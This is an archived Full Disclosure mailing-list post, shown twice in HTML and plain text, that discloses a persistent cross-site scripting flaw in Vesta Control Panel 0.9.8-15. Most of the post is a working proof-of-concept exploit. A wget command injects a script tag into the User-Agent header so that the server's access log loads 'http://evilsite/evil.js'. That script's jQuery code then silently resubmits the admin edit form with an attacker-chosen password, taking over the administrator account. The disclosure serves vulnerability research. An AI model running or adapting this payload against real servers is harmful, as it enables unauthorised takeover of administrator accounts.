[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability
- From: Necmettin COŞKUN <h@xxxxxxx>
- Date: Thu, 18 Feb 2016 16:16:08 +0200
<div><p># Exploit Title :Vesta Control Panel <= 0.9.8-15 - Persistent
XSS Vulnerability<br /># Vendor Homepage :http://www.vestacp.com<br />#
Version :0.9.8-15<br /># Exploit Author :Necmettin COSKUN
@babayarisi <br /># Blog :http://ha.cker.io<br /># Discovery date
:16/02/2016<br /># Tested on :Fedora23 - Chrome/Firefox/Maxthon</p><p>We can
use user-agent information to attack website like this. <br />First of all we
change our user-agent and add some dangerous javascript code ( XSS etc. ) <br
/>and then we request to one of the website on target server then it is saved
on access.log by server <br />so when Administrator reads it the javascript
code works that we added our user-agent information.</p><p>Poc Exploit<br
/>================<br />1.Prepare evil js file</p><p>function
csrfWithToken(url,hanimisToken,password){<br /> $.get(url, function(gelen) {<br
/> $('body').append($(gelen));<br />
$('form[id="vstobjects"]').css("display","none");<br /> var token =
$(hanimisToken).attr("token");<br />
$('form[id="vstobjects"]').attr("action",url);<br />
$('input[name="v_password"]').val(password); <br />
$('form[id="vstobjects"]').submit(); <br /> });<br />};<br />//password =
1234567<br
/>csrfWithToken("/edit/user/?user=admin","#token","123456");</p><p>2. Make a
Get request with evil user-agent to victim server<br /> <br />wget
--header="Accept: text/html" --user-agent="<script
src='http://evilsite/evil.js'></script>" http://victimserver<br /> <br
/>3. We wait Administrator to read access.log that injected our evil.js<br />4.
We log-in VestaCP via password we changed<br />http(s)://victim:8083/<br />
<br /> <br />Discovered by:<br />================<br />Necmettin COSKUN
|GrisapkaGuvenlikGrubu|4ewa2getha!</p></div># Exploit Title    :Vesta Control Panel <= 0.9.8-15 - Persistent XSS
Vulnerability
# Vendor Homepage  :http://www.vestacp.com
# Version          :0.9.8-15
# Exploit Author   :Necmettin COSKUN @babayarisiÂ
# Blog             :http://ha.cker.io
# Discovery date   :16/02/2016
# Tested on :Fedora23 - Chrome/Firefox/Maxthon
We can use user-agent information to attack website like this.
First of all we change our user-agent and add some dangerous javascript code (
XSS etc. )
and then we request to one of the website on target server then it is saved on
access.log by server
so when Administrator reads it the javascript code works that we added our
user-agent information.
Poc Exploit
================
1.Prepare evil js file
function csrfWithToken(url,hanimisToken,password){
$.get(url, function(gelen) {
$('body').append($(gelen));
$('form[id="vstobjects"]').css("display","none");
var token = $(hanimisToken).attr("token");
$('form[id="vstobjects"]').attr("action",url);
$('input[name="v_password"]').val(password);
$('form[id="vstobjects"]').submit();
});
};
//password = 1234567
csrfWithToken("/edit/user/?user=admin","#token","123456");
2. Make a Get request with evil user-agent to victim server
wget --header="Accept: text/html" --user-agent="<script
src='http://evilsite/evil.js'></script>" http://victimserver
3. We wait Administrator to read access.log that injected our evil.js
4. We log-in VestaCP via password we changed
http(s)://victim:8083/
 Â
 Â
Discovered by:
================
Necmettin COSKUNÂ |GrisapkaGuvenlikGrubu|4ewa2getha!
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/